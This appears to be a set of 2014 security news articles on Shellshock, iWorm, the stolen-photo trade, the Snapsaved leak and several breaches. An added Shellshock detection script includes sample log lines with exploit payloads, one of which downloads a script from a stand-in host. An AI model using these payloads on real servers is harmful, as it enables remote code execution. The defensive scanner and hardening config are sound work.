Security researcher Jonathan Hall says he has found evidence that Romanian hackers used the Shellshock bug to gain access to Yahoo servers, according to a post on his website Future South.
The Shellshock bug lets an attacker run commands on a server through a flaw in Bash, the command shell used on most Linux and Unix systems, whenever untrusted input such as a web request header is handed to Bash as an environment variable. The flaw had existed for more than 20 years but was only publicly disclosed in September. An attacker who exploits it gets to run commands with the privileges of the exposed service, and from there can read whatever is stored on the server.
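As an added example, not code from the article or from Jonathan Hall's write-up, the following Python script does two things a defender would do after the Shellshock disclosure: it runs the standard one-line probe against the local bash binary to see whether it is still vulnerable, and it scans web-server access logs for the "() {" marker that exploit attempts against CGI scripts carry in request headers. The function names (bash_is_vulnerable, scan_log) and the sample log lines are constructed for illustration; the addresses come from the documentation IP ranges.

```python
"""Shellshock (CVE-2014-6271) checks: local bash probe and web-log scan.

Added example; not code from the article or from Jonathan Hall's
write-up. The sample log lines are constructed for illustration and
use addresses from the documentation ranges (198.51.100.0/24,
203.0.113.0/24).
"""
import os
import re
import subprocess
from typing import Dict, Iterable, List, Optional

# An unpatched bash parses any environment variable whose value begins
# with "() {" as a function definition and then executes whatever follows
# the closing brace. A CGI script exports request headers (User-Agent,
# Referer, Cookie, query string) into the environment, so the attacker
# controls such a value.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Apache/nginx "combined" log format. Quoted fields may contain \" escapes.
_Q = r'(?:[^"\\]|\\.)*'
COMBINED_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>' + _Q + r')" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>' + _Q + r')" "(?P<agent>' + _Q + r')"$'
)


def bash_is_vulnerable(bash: str = "bash") -> Optional[bool]:
    """Run the classic probe against a local bash binary.

    Returns True if the exported function body executes (vulnerable),
    False if bash ignores the trailing command (patched), and None if
    bash cannot be run at all.
    """
    env = dict(os.environ)
    env["x"] = "() { :;}; echo VULNERABLE"
    try:
        proc = subprocess.run([bash, "-c", "echo probe"], env=env,
                              capture_output=True, text=True, timeout=5)
    except (OSError, subprocess.TimeoutExpired):
        return None
    return "VULNERABLE" in proc.stdout


def scan_log(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Return one record per log line that carries a Shellshock payload."""
    hits = []
    for line in lines:
        m = COMBINED_RE.match(line.rstrip("\n"))
        if not m:
            continue  # not combined format; skip rather than guess
        for field in ("request", "referer", "agent"):
            if SHELLSHOCK_RE.search(m.group(field)):
                hits.append({
                    "client": m.group("client"),
                    "time": m.group("time"),
                    "field": field,
                    "request": m.group("request"),
                    "payload": m.group(field),
                })
                break
    return hits


# Constructed sample: two benign requests and two exploit attempts against
# a CGI script, one delivered via User-Agent and one via Referer.
SAMPLE_LOG = [
    '203.0.113.9 - - [06/Oct/2014:10:12:01 +0000] "GET /index.html HTTP/1.1" '
    '200 5123 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [06/Oct/2014:10:12:07 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" '
    '200 3 "-" "() { :;}; /bin/bash -c \'wget http://203.0.113.200/x.sh -O /tmp/x.sh\'"',
    '198.51.100.7 - - [06/Oct/2014:10:12:09 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" '
    '500 0 "() { ignored;}; echo; /bin/id" "curl/7.38.0"',
    '203.0.113.42 - - [06/Oct/2014:10:13:44 +0000] "GET /games/ HTTP/1.1" '
    '200 9812 "http://www.example.com/" "Mozilla/5.0 (X11; Linux)"',
]

if __name__ == "__main__":
    state = {True: "VULNERABLE", False: "patched", None: "bash not found"}
    print("local bash:", state[bash_is_vulnerable()])
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['time']} {hit['client']} via {hit['field']}: {hit['payload']}")
```

The probe only tells you about the bash binary on the machine you run it on; a web server is exposed when a CGI script, a DHCP client hook or any other process hands attacker-controlled strings to bash, so the log scan is the check to run against the hosts Hall was describing. Lines that do not parse as combined format are skipped rather than guessed at, so run it against the right log file.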
Hall, a technology consultant and Unix expert, outlined in his post the process he used to track down the hacked Yahoo servers. Hall used a Google search to find servers that had been left vulnerable to Shellshock. He discovered that the WinZip.com domain was being used by hackers to track down other servers that could be vulnerable to the bug.
Hall went on to find that Romanian hackers had gained access to Yahoo's servers, and were gradually exploring the network in search of the popular Yahoo! Games servers. Yahoo's games are played by millions of people, making them a target for hackers looking to wreak havoc. Through his research, Hall discovered that two of Yahoo's servers had been breached by hackers, and that more could have already been accessed.
In an email to Bloomberg Businessweek, Yahoo confirmed that three of its servers had been hacked using the Shellshock vulnerability. Company spokesperson Elisa Shyu said, "As soon as we became aware of the issue, we began patching our systems and have been closely monitoring our network. We isolated a handful of our impacted servers and at this time we have no evidence of a compromise to user data."
Yahoo's servers were vulnerable because they were running an unpatched version of the Bash shell. Hall emailed and tweeted Marissa Mayer, as well as a member of Yahoo's engineering team. Eventually he received a response from Yahoo confirming that its servers had been breached and that it was working through its incident response process. Hall says Yahoo declined to pay him for the discovery because the finding fell outside the company's bug bounty program.
Yahoo has come under fire in the past for its response to security researchers who uncover bugs in its servers. In 2013 the CEO of a security firm was awarded a $25 voucher for Yahoo-branded items after he uncovered three bugs in Yahoo's online services.
In his first major television interview, the director of the FBI has warned that Chinese hackers have embarked on a widespread campaign of cyberwarfare against the US.
There are two kinds of big companies in the United States. There are those who've been hacked by the Chinese and those who don't know they've been hacked by the Chinese.
When asked whether Chinese hackers were particularly good at gaining access to servers belonging to US companies, Comey said the hackers were not actually skilled when it came to covering their tracks.
I liken them a bit to a drunk burglar. They're kicking in the front door, knocking over the vase, while they're walking out with your television set. They're just prolific. Their strategy seems to be: We'll just be everywhere all the time. And there's no way they can stop us.
Comey said Chinese hackers were not looking to profit from stolen credit-card details or personal information. Instead, they are after trade secrets and similar business information that can be put to use in China:
[They're looking for] information that's useful to them so they don't have to invent [it]. They can copy or steal to learn about how a company might approach negotiations with a Chinese company, all manner of things.
"60 Minutes" host Scott Pelley asked Comey how much Chinese hackers were costing the US economy. He said the cost was impossible to count but was likely in the billions.
Apple has added the iWorm backdoor to its built-in malware definitions after roughly 17,000 Macs were found to be infected with it.
Business Insider reported on Friday that a Russian security firm discovered a piece of malicious software known as "Mac.BackDoor.iWorm" on Mac computers around the world. The malware gave hackers remote control of the computer and could have been used to send spam emails, knock websites offline with denial-of-service traffic, or mine Bitcoin. However, there's no evidence that the hackers got the chance to use their botnet before it was discovered.
Mac Rumors reported on Saturday that Apple updated its XProtect definitions to block the iWorm program. XProtect is the malware-signature check built into every Mac: it compares downloaded files against Apple's list of known malware, so a Mac with current definitions will refuse to open the known iWorm installer. It does not by itself clean a machine that is already infected.
Here's the updated XProtect definition that shows Apple has added iWorm to the list of blocked programs:
iWorm located its command-and-control servers in an inventive way. The malware searched Reddit for posts in a fake discussion forum for the video game Minecraft; those posts contained the addresses of the command servers operated by the hackers.
After the security firm Dr. Web announced the discovery, the Reddit account the hackers used to share links to their command servers was closed. Over the weekend, Reddit banned the fake Minecraft subreddit, leaving iWorm with no way to receive orders from the hackers through that channel.
Additionally, an anonymous tipster told The Safe Mac how iWorm spread. It's reported that the malware reached Mac computers through pirated software downloads hosted on The Pirate Bay. Anybody who downloaded cracked versions of Adobe Photoshop, Adobe Illustrator, Microsoft Office, or Parallels from a Pirate Bay user named "aceprog" was asked for administrator access to install the pirated software. Once the user approved that request, iWorm installed itself with those privileges.
Some dealers say the celebrity-photo-trading industry died on the afternoon of Labor Day 2014. An anonymous pornography collector, "OriginalGuy," did the unthinkable and set about uploading his entire collection of stolen photographs to the notorious porn forum AnonIB — hundreds of images of 101 different actresses and singers. When users discovered what was happening, they swarmed the site. Eventually he was unable to load the forum to post any more images, so he took to 4chan, the anarchic discussion forum read by thousands.
That's when people really started to notice what was going on.
Hours after OriginalGuy shared hundreds of stolen photographs of female celebrities, the media began to realize what had happened. At first, they weren't sure how to report on the incident. Gossip blogger Perez Hilton re-uploaded stolen naked photographs to his site, and he was forced to issue an apology hours later due to widespread outrage. TMZ, the celebrity news site famed for breaking stories of hacking and sex scandals, took hours to publish anything on the leaked images. It looked like this was a world-first: Hackers had infiltrated Apple's iCloud service and made away with a seemingly endless trove of stolen photographs. But for those in the know, this wasn't new. Rather, it signaled the death of a thriving underground industry that had existed online for years.
This is the story of that death, and the way it led within days to a reconstitution of the marketplace in a new home, where it thrives today.
/stol/, Short For "Stolen"
The pornography forum AnonIB was started in May 2006, formed as an offshoot site of the notorious anonymous message board 4chan. The site was controversial from its very inception. AnonIB has struggled to prevent its users from posting child porn on the site, which includes the subforums "Teens (18+)" and "Drunk/Passed Out." One board proved particularly popular: /stol/, short for "Stolen" and "Obtained Pictures." For years, /stol/ served as a kind of advertising system, almost like a Craigslist for hackers.
Here's the kind of ad users see on AnonIB. This French hacker advertises his services as a "ripper" who can steal naked photographs from iCloud accounts:
But after OriginalGuy posted his trove of photos online, AnonIB was immediately taken down. For two weeks, the site said it was undergoing "scheduled maintenance." The truth was that the site's anonymous operator was scrubbing the site of any incriminating evidence that linked the porn forum to the iCloud hacks.
When AnonIB came back online, every post in the /stol/ forum had been deleted. Thousands of stolen photographs and hundreds of ads for iCloud hackers had been removed. The internet's celebrity-photo-trading ring gradually realized that its central hub had been compromised.
Nonetheless, some dedicated users returned, asking for help in stealing photographs of women. They were cautioned against posting on the site, and warned that journalists were monitoring AnonIB for information about how iCloud accounts were illegally accessed.
The mass leak of celebrity photos (dubbed "The Fappening" by fans amazed at the scale of the collection) forced would-be photo leakers to take to private forums and chatrooms. They communicate using a network of monikers, encrypted email addresses, and Google-hosted Blogger pages.
Google's Servers Host A Thriving Market In Hacked Pictures
One of the new hubs for stolen photographs of celebrities is a blog known as "Abi Wins." It's public and available for anyone to view. Abi Wins is also hosted on Google's Blogspot servers, which is unfortunate for the company that so keenly defended itself against an accusing letter from top Hollywood lawyer Marty Singer.
In his note to Google founders Larry Page and Sergey Brin, as well as chairman Eric Schmidt, Singer accused Google of failing to remove photographs from its Blogger service. Google responded to the letter, defending its moderation procedures, remarking:
We've removed tens of thousands of pictures — within hours of the requests being made — and we have closed hundreds of accounts. The Internet is used for many good things. Stealing people’s private photos is not one of them.
The Abi Wins blog is used to index stolen photographs of celebrities obtained by accessing iCloud accounts. Users then discuss the latest leaked images using Chatango, a chatroom tool created by programmers from MIT, Caltech, and Berkeley. Business Insider contacted Chatango to inform them of the chatroom, and it was deleted. We also reached out to Google about Blogspot and will update this post when we hear back.
But the Abi Wins blog is just the public gateway to the internet's celebrity-photo-trading ring, which lives on despite the increased press attention that occurred following the Labor Day leak.
The New Home For Stolen Pictures
The celebrity-photo fans who used to gather on AnonIB have a new home on the internet: Volafile. The German site offers real-time file sharing for large groups of people, along with a chat facility to discuss the files posted. The site allows the creation of anonymous accounts, and it offers fast upload speeds. For iCloud hackers with collections of celebrity photos to offload, Volafile is a dream come true. New celebrity photo leaks are now emerging almost exclusively through Volafile.
When a photo collector is about to leak new stolen photographs, that person posts excited messages, creating hype for whatever is about to appear online.
The left of this screenshot shows the chatroom discussion of leaked images, and the list on the right shows files uploaded to the room. A user named "realpsamathe" is excitedly announcing a new celebrity leak, posting "HERE WE GO." in the chat:
"realpsamathe" uploaded a large video file named "THE ONE YOU'VE BEEN WAITING FOR." The file was a video sent by actress Abigail Spencer, known for her roles in "Cowboys & Aliens" and the TV show "Suits," to her boyfriend, actor Josh Pence, who starred in "The Dark Knight" and "The Social Network."
Chatroom users rushed to thank realpsamathe for posting the stolen video.
As users downloaded and viewed the stolen video, which had just been shared online for the first time, they offered to send Bitcoin donations to realpsamathe. He declined, saying, "I don't want donations." He instructed users to "go donate somewhere meaningful" and shared a link to a Unicef donation page to help fight Ebola in Africa.
The Trade In Photos Of Under-Age Celebrities
Users constantly request photographs of the 18-year-old Olympic gymnast McKayla Maroney and actress Bella Thorne, who is just 17. Naked photographs of both women are said to have leaked online as part of the iCloud leak, with the photographs taken while both were underage. That hasn't stopped celebrity-photo fans requesting that others post the child pornography online. Every request results in a debate over the ethics of child pornography.
New photographs and videos of female celebrities are still being posted online on a daily basis. "OriginalGuy," the person who first leaked the images, seems to have gone silent, but other established photo traders have realized that the industry is all but dead and are offloading their collection for Bitcoin (and the adoration of their peers) using chatrooms like Volafile.
When Business Insider contacted Volafile founder N. Kuhnhenn, the chatrooms were deleted, along with the content hosted on Volafile and the backup chatrooms reserved for "emergency use." Kuhnhenn told Business Insider that he deletes rooms that breach the site's terms of use as he finds them.
Yet Another Massive Cache Of Celebrity Photos Is Poised To Leak
But there's an even more secretive side to the online photo-trading industry. Private dealers still operate, using encrypted email accounts and fake names to avoid detection. After observing the conversations in the main Volafile chatroom, Business Insider learned that a dealer named "Sets Ahoy" had a substantial collection of unreleased images, potentially equal in size to the "OriginalGuy" collection that was posted online on Labor Day. (A "set" is a collection of images, usually about a dozen.)
Using cached versions of deleted messages on the anonymous note site Pastebin, Business Insider was able to contact Sets Ahoy through his encrypted email address. Posing as a potential buyer, Business Insider messaged the photo dealer. We didn't specify what we were looking to buy, just that we had heard he was reliable. Sets Ahoy replied within hours, telling us, "You came to the right guy." He sent over his catalogue of stolen celebrity photographs and videos without any prompting. Here it is in full:
Continuing to pose as an interested buyer, we expressed interest in the photographs of the British model Daisy Lowe. No stolen photographs of Lowe have leaked online. If Sets Ahoy were to possess them, it would help to prove there may be thousands of stolen photographs yet to be released.
Minutes after we expressed our interest in the Daisy Lowe photographs, Sets Ahoy replied with a price.
For about $350 (roughly one bitcoin), Sets Ahoy was selling a collection of stolen naked celebrity photographs. To prove that he was in possession of the photographs, Sets Ahoy sent a Dropbox link to a sample photograph from the Daisy Lowe set. The photograph apparently shows Lowe in a hotel bathroom with an unnamed male. Their genitals are obscured by black bars, and Sets Ahoy's email address is watermarked over the image. Sample photographs are intentionally censored by traders to reduce their value and prevent other dealers from selling the same collections. Minutes after Sets Ahoy uploaded the sample to Dropbox, he deleted it to avoid detection from Dropbox's illegal content filters. Business Insider contacted Dropbox for comment on this story, and we will update this post when we hear back from them.
Sets Ahoy sent Business Insider a Bitcoin payment address for the one bitcoin he wanted for the stolen photographs. The address was newly created, with no previous transactions. Dealers typically generate a fresh address for each sale and abandon it afterwards, which makes a single payment harder to tie to their other activity, although every transaction still remains visible on the public blockchain. Business Insider did not purchase any photographs, and the sample image was deleted as soon as it was received. We contacted Daisy Lowe's representatives prior to publication to inform them that their client was a target of iCloud hackers, and that stolen photographs of her were circulating online.
Hundreds Or Thousands Of Photos Have Been Stolen
The collection of photographs that OriginalGuy posted online on Labor Day is by no means the full extent of the stolen material that photo traders possess. Dealers like Sets Ahoy have hundreds, possibly thousands, of photographs and videos of female actresses that they are seeking to offload. Some traders realized that OriginalGuy's leak changed the underground industry forever, and so they have taken to leaking the images online for free, as realpsamathe has been doing on Volafile.
It's difficult for Hollywood lawyers like Marty Singer to clamp down on the spread of stolen photographs online. For every blog shut down, and every chatroom deleted, the community of people hungry for more content moves on to another site. It's difficult to see where the community will move next, although the trend is to adopt more private networks.
There has been talk of a "deepweb" marketplace for stolen celebrity photographs, reachable only through the Tor browser. A Tor hidden service is not part of the regular web, so ordinary search engines cannot index it, and nobody can find it without knowing the long string of letters and numbers that forms its .onion address. Until the dealers move to such a site, however, the traces of the internet's underground photo-trading ring remain: cached pages, notes, emails, and forums linger online for lawyers, journalists, curious internet users, and potential buyers to discover.
Hackers likely obtained the photographs of Smith by accident after accessing the iCloud account of his former girlfriend.
The collection of photographs leaked online today appears to be the same series of images that a stolen photo dealer attempted to sell to Business Insider for 1 bitcoin (around $350). After learning of the existence of the photographs, Business Insider contacted Daisy Lowe's representatives to inform them that their client had been targeted by hackers.
No male celebrities are known to have been specifically targeted by the iCloud hackers; instead, their photos usually turn up by accident.
Naked photographs of actor Dave Franco were part of the "OriginalGuy" leak that took place on Labor Day. However, those images only emerged after hackers were looking for photographs of actress Alison Brie.
The only other male celebrity implicated in the iCloud hack has been Nick Hogan. It's claimed that naked photographs of the reality television star were part of a trove of images obtained from his iCloud account, along with photographs of his mother in underwear and images of his former girlfriends. The hackers are likely to have hacked the account in search of the photographs showing Hogan's underage girlfriends.
The hackers behind the celebrity leaks continue to post photographs online on a regular basis, as Business Insider previously reported. Attempts to shut down their forums and chatrooms have been futile, as they simply move to new sites and continue sharing stolen photographs.
If you’re one of the millions of people whose name and contact information fell into the hands of hackers who attacked JPMorgan Chase, prepare yourself: You may be targeted by attempts to pry out more critical information.
While the bank hasn’t detected any fraud and says all money is safe, the breach exposed the names, addresses, phone numbers and email addresses tied to 76 million households and 7 million small businesses. There was no sign of stolen account numbers, passwords, user identifications, birthdates or Social Security numbers, Chase says.
What you should do
Given this massive exposure of customer contact information, people affected should be on the lookout for spam emails, phone calls and text messages, says Avivah Litan, a vice president and distinguished analyst at Gartner Research, an information technology research company. Fraudsters may be looking to take advantage of you through techniques known as phishing.
“We’re already seeing a lot of these spam emails and texts and phone calls as a result of previous breaches, so this is just going to add to it,” Litan says. “All the data is being collected and sold on the black market, and different criminals buy it for different reasons.”
If you receive suspicious messages or calls, don’t give out credit card digits, Social Security numbers, or any other private information. Banks will never ask for this by email, so if someone does request it, you’re probably dealing with a fraudster.
Don’t trust, do verify
Consumers shouldn’t necessarily trust communications that explicitly mention the name of Chase or any other bank.
“I would envision that a lot of the phishing exploits would mention Chase specifically,” says Doug Johnson, a senior vice president at the American Bankers Association. “What the phisher is trying to do is send you something which you would have a reasonable expectation of opening up.”
Chase also warns consumers not to click on links or open attachments in fishy emails. To avoid being reeled into one of these traps by telephone, hang up on any suspicious caller claiming to be from the bank, then call the bank back using the number printed on your card or statement, or visit a branch in person. Chances are the call was a phishing expedition.
Chase customers aren’t the only ones who should take precautions, Johnson says.
“This was a marketing database; it wasn’t a customer database,” he says of the Chase target the hackers breached. “So while a majority of the data will be of customers, there will be some non-customer data in there as well.”
“[People] can’t stop the theft of the data, but they can stop the use of the stolen data in terms of harming them,” Litan says.
Report suspicious activity
With this security breach – affecting the largest number of people of any known incursion to date – and recent attacks on Target, Michaels, Neiman Marcus and Home Depot, it’s obvious that successful hacks are becoming more common. Therefore, all consumers should check their credit and debit account statements regularly to look for unauthorized purchases.
Report any suspicious activity to your card issuer, bank or credit union immediately to avoid potential liability; the sooner you speak up, the more likely you are to get your money back, Litan says.
Small business owners should take the same precautions and train their employees, including bookkeepers and treasurers, to be wary of potential scams, Litan says.
Additionally, you may want to place a fraud alert on your credit report, change passwords and consider identity theft protection services, the Consumer Bankers Association advised earlier this month. For more safety tips, check out this handy guide. With a little luck and some proactive steps now, you may avoid the pain that having your credit and bank accounts hacked can cause.
A giant database of intercepted Snapchat photos and videos has been released by hackers who have been collecting the files for years. Shocked users of the notorious chat forum 4chan are referring to the hack as "The Snappening," noting that this is far bigger in scale than the iCloud hacks that recently targeted celebrities.
Underground photo trading chatrooms have been filled in recent weeks with hints that something big was coming. Thursday night it finally arrived: A third-party Snapchat client app has been collecting every single photo and video file sent through it for years, giving hackers access to a 13GB library of Snapchats that users thought had been deleted.
Users of 4chan have downloaded the files, and are currently in the process of creating a searchable database allowing people to search the stolen images by Snapchat username.
The database of Snapchat files posted online was hosted on viralpop.com, a fake competition website that installed malicious software on the computers of users trying to take part. That site has now been suspended and taken offline, although thousands of people have already downloaded the collection of Snapchats.
This is what the collection of intercepted Snapchat photos and videos looked like:
There are 2 Sites That May Have Been Hacked
One news report suggests the hacked third-party Snapchat client was Snapsave. The popular Android app allowed users to keep Snapchat photos and videos, which automatically delete when viewed through the official Snapchat app.
But an anonymous photo trader contacted Business Insider to tell us that the site affected was actually SnapSaved.com. The service acted as a web client for the Snapchat app that allowed users to receive photos and videos, and save them online. What its users didn't realize was that the site was quietly collecting everything that passed through it, storing incriminating Snapchats on a web server, with the usernames of senders attached.
This is what SnapSaved looked like in October 2013:
SnapSaved disappeared several months ago. Now the URL redirects to a Danish e-commerce site that sells set-top boxes and television antennas. Most of the intercepted Snapchat photographs posted online featured overlaid messages in Danish.
4chan users claim that SnapSaved was indeed the source of the intercepted files:
We don't know whether the third-party Snapchat client, whether Snapsave or SnapSaved, was created with the purpose of intercepting images. It may have been the case that hackers accessed the servers of one of the sites, which had inadvertently stored the files, and rehosted the directory online.
4chan users say the collection of photos has a large amount of child pornography, including many videos sent between teenagers who believed the files would be immediately deleted after viewing. Half of Snapchat's users are teenagers between the ages of 13 and 17.
BEIJING (Reuters) - Anonymous, the nebulous online activist group that uses hacking to further causes it supports, has threatened a major blackout of Chinese and Hong Kong government websites, and to leak tens of thousands of government email address details.
The group, under the banner of 'Operation Hong Kong' or '#OpHongKong' and '#OpHK' on Twitter, said on Friday it will launch a mass effort against Chinese government servers to bring down their websites via Distributed Denial of Service (DDoS) attacks on Saturday.
DDoS attacks attempt to cripple networks by overwhelming them with Internet traffic.
"Here's your heads up, prepare for us, try to stop it, the only success you will have will be taking all your sites offline," an Anonymous statement posted online said. "China, you cannot stop us. You should have expected us before abusing your power against the citizens of Hong Kong."
Demonstrations in Hong Kong have seen the use of tear gas, violent clashes and mass disruptions to business and traffic as people campaign for the right to democratically elect the Asian financial hub's leader.
Hong Kong's refusal so far to negotiate with protesters, and a police reaction that many labeled as heavy-handed, have sparked widespread condemnation that has now spread to Anonymous, which often campaigns for civil liberties by attacking people or institutions it sees as opponents of those rights.
"If this is true, it will show that the Chinese government is a victim of internet hacking," said Foreign Ministry spokesman Hong Lei at a daily news briefing. "China has consistently stressed our opposition to all internet hacking attack activities. We rebuke the acts of this organization."
"This kind of internet attack violates the law and social morals, and we have already reported it to the police," it said, adding that the website was running normally again.
"Prepping for massive DDoS attacks, Database dumps, etc... Will be destroying #ChinaGovernment," wrote one Anonymous participant on Twitter.
China's Defense Ministry, in a statement sent to Reuters, said its website is subject to numerous hacking attacks every day from both home and overseas.
"We have taken necessary steps to protect the safe operation of the Defense Ministry website," it added.
Kmart on Friday confirmed that its systems were breached by hackers who were able to steal credit and debit card data for customers shopping in its retail stores from early September until October 9, when the breach was discovered. It's not clear at this time how many customers may have been affected or how many Kmart stores were hit, as the company has yet to announce any numbers.
However, Kmart did say that “based on the forensic investigation to date, no personal information, no debit card PIN numbers, no email addresses and no social security numbers were obtained by those criminally responsible.” The company said there’s no evidence that any Kmart shopper was impacted, and added that it’ll be offering free credit monitoring protection to customers that have shopped in Kmart stores during the period.
Kmart says its systems were attacked by a new form of malware, which has been removed by its security team.
Sears spokesman Chris Brathwaite also confirmed the hack, Krebs on Security reports, saying that Kmart systems "were infected with a form of malware that was currently undetectable by anti-malware systems. Our IT teams quickly removed that malware, however we do believe that debit and credit card numbers have been compromised." Sears said that its Sears stores have not been hit by a similar attack.
It’s not clear whether the hack is related in any way to similar breaches that occurred at Home Depot or Target, to name just a couple of prominent credit card heists that took place in the last 12 months.
One of the anonymous developers of a third-party Snapchat client has claimed that hackers managed to break into his site, confirming the source of the 100,000 Snapchat photos and videos that leaked online last week in an event known as "The Snappening."
In a Facebook post, Snapsaved claims that a misconfiguration in its Apache server exposed the site's store of saved Snapchat photos and videos to hackers. This meant that hackers were able to access the trove of nearly 100,000 files and post them online at another site.
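The page does not show Snapsaved's configuration, but the failure mode it describes, an Apache directory index exposing a store of uploaded files, is a common one. The fragment below is an added example, not Snapsaved's own configuration: the weak setting beside the corrected one. The paths /var/www/html and /var/www/html/saved are assumed.

```apache
# Weak: automatic directory listings are enabled for the document root, and
# the saved media sits underneath it. Anyone who guesses or learns the
# /saved/ URL gets an auto-generated index of every file with no login.
<Directory "/var/www/html">
    Options +Indexes +FollowSymLinks
    AllowOverride None
    Require all granted
</Directory>

# Hardened: no auto-index anywhere under the document root. A request for a
# directory without an index file now returns 403 instead of a listing.
<Directory "/var/www/html">
    Options -Indexes +FollowSymLinks
    AllowOverride None
    Require all granted
</Directory>

# The stored media should live outside DocumentRoot and be served to the
# owning, authenticated user by the application. If the directory cannot be
# moved (assumed path), deny direct web access so only the application can
# read it.
<Directory "/var/www/html/saved">
    Require all denied
</Directory>
```

After `apachectl configtest` and a reload, `curl -s -o /dev/null -w '%{http_code}' http://host/saved/` should return 403 rather than a 200 carrying an HTML file listing. Disabling Indexes only hides the listing; the `Require all denied` block (or moving the files out of the web root) is what stops a hacker who already knows or can guess a file name.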
A post on anonymous note site Pastebin had accused the administrators of Snapsaved of intentionally providing hackers with access to the site's store of saved images. In the new Facebook post, Snapsaved denies this claim.
Snapsaved goes on to deny that usernames were leaked along with the images, which means that rumors of a searchable database of the images are likely false. Posters on 4chan had claimed that the usernames of the teenagers shown in the explicit photographs were leaked along with the images themselves. They claimed that a database was being built that would allow people to search the archive of stolen photographs by username.
Here are 4chan users discussing the rumored database:
Snapsaved claims that it took the site offline as soon as it realized that it had been hacked. Users appear to have believed that Snapsaved let them save their Snapchat photos on their own devices; they didn't know that the pictures were also being saved on servers owned by Snapsaved. There is no evidence that Snapsaved had attempted to alert users of the site that their saved Snapchat photos and videos had leaked. Instead, the snapsaved.com URL was changed to redirect to a shopping website.
The Facebook post also confirms that the majority of Snapsaved users were either Swedish, Norwegian or American. Snapsaved goes on to claim that it previously reported users to Swedish and Norwegian authorities, signaling that whoever runs the site had been viewing the private images sent through it.
The Snapsaved hack has raised serious concerns over the security of Snapchat's API. Over half of the app's users are aged between 13 and 17, but it's trivially easy for developers to reverse-engineer the app's API to create a third-party app or website that saves photos and videos that are intended to be deleted upon receipt.
It had previously been feared that hackers created Snapsaved with the sole purpose of intercepting explicit photos and videos of children. Snapsaved's statement seems to dispel this theory, instead increasing concern over the security of Snapchat's support for external developers.
In a statement released following the Snapsaved hack, Snapchat blamed its users for downloading and using third-party apps to save Snapchats. They cautioned against the use of any Snapchat apps that aren't developed by the company, warning that these sites are prohibited by the company's terms of use.
Here's the full Facebook post from the Snapsaved developer:
I would like to elaborate on the recent events regarding Snapsaved.com. Snapsaved.com was a website used to save Snapchats, precisely as the app snapsave. In response to recent media events and the statement made by http://pastebin.com/cJcTbNz8, I would like to inform the public that snapsaved.com was hacked; the dictionary index the poster is referring to was never publicly available. We had a misconfiguration in our Apache server. SnapChat has not been hacked, and these images do not originate from their database. Snapsaved has always tried to fight child pornography; we have even gone as far as reporting some of our users to the Swedish and Norwegian authorities. As soon as we discovered the breach in our systems, we immediately deleted the entire website and the database associated with it. As far as we can tell, the breach has affected 500MB of images, and 0 personal information from the database. The recent rumors about the snappening are a hoax. The hacker does not have sufficient information to live up to his claims of creating a searchable database. Our users had to consent to all the content they received via SnapSaved.com; as we mentioned, we tried to cleanse the database of inappropriate images as often as possible. The majority of our users are Swedish, Norwegian and American. I sincerely apologize on the behalf of snapsaved.com; we never wished for this to happen. We did not wish to cause SnapChat or their users any harm, we only wished to provide a unique service.
Crystal Grave was sitting in a cafe in Menlo Park, California, on Thursday night when she received an email letting her know that someone had mentioned the name of her company. She'd set up a Google Alert to notify her whenever a blogger or journalist posted anything online mentioning the name of her event-planning search engine: Snappening.
Sure enough, journalists began to mention Snappening en masse in the coming hours, as reports emerged that a third-party Snapchat app had been hacked, and almost 100,000 private photos and videos had leaked online. Many of the images were explicit images of children. Online commenters had dubbed the event "The Snappening," a combination of "Snapchat" and "Happening," and a pun on the nickname of the last mass photo leak, "the Fappening."
Grave quickly realized that the leak of tens of thousands of private photos was an opportunity to promote her business. Speaking to Business Insider, Grave explained how her company watched press coverage of the hack:
Our team is enjoying seeing the discussion in social media locally, nationally and internationally...It’s been fun engaging with such a wide audience in real-time from across the globe.
As she noticed people talking about the hack online, Grave made sure that her company cashed in by creating an ad, or a "meme" as she is keen to call it. Here's the tie-in ad Snappening produced to coincide with the photo hack that targeted thousands of children around the world.
We asked Grave whether she had seen any new business resulting from the Snapchat hack:
Our web traffic on www.snappening.com has increased dramatically. We estimate we’ll have served more than 100,000 new visitors by the time the #TheSnappening hack runs its course as an international news phenomenon. While the incident is really only about four days old, we’ve already seen new registered user accounts and have started receiving phone calls of interest from across the country ... I think it has successfully increased the awareness of our brand without negative consequences.
Last night an anonymous hacker claimed to be in possession of 7 million passwords to Dropbox accounts. While that claim was probably false, it demonstrates the increasingly common way that hackers are using to gain access to your passwords.
The hacker posted around 400 usernames and passwords on anonymous note site Pastebin in a series of "teasers" for the main list. Some Reddit users were able to successfully log into Dropbox using the information posted before the company deactivated all of the leaked passwords.
So where do the passwords come from? After all, they worked, for a time.
The most likely source of the information is a third-party site that had poor security. Hackers know that most internet users re-use their passwords, so they often target smaller apps made by amateur developers. These easy targets have poor security — usernames, passwords or files may be stored in a way that makes them easy to steal.
The recent Snapchat hack, which saw nearly 100,000 private photos and videos posted online, happened because an amateur developer hadn't securely set up his website. In a post on the Snapsaved Facebook page, the site's anonymous founder explains that a misconfigured Apache server left the files vulnerable to hackers.
Hackers don't need to try and target the tech giants anymore. Why bother trying to hack into Google, Apple or Facebook's servers when you can simply take advantage of a poorly built website to get the same information?
We're now seeing hackers use a new approach. Instead of spending months finding vulnerabilities in large sites, they re-use login information stolen from amateur third-party apps. Chances are that the information works for several sites, so compiling these caches of data together can quickly create a list of millions of passwords.
In September, Russian hackers published a list of 5 million passwords to a variety of different email providers, including Gmail. It wasn't a new leak, but a collection of older password leaks compiled together to seem new. Sure, many of the email accounts had closed, but the information could still be downloaded and used by hackers to break into other accounts.
So why are hackers re-using old information? There's rarely evidence that they actually use the passwords to log into sites. Instead, it seems like they just post the information online. Or at least, they post some of the information online. As we mentioned before, hackers leak partial collections of passwords as "teasers." This is often accompanied by a request for Bitcoin donations.
We can use the public nature of Bitcoin addresses to see just how much hackers gain for posting passwords online. It's often less than they expect to receive. The hacker who shared the collection of Dropbox passwords received just 8 cents. Similarly, OriginalGuy, the anonymous forum poster behind the first wave of hacked iCloud celebrity photos, expressed dismay at the small trickle of donations that came his way, remarking:
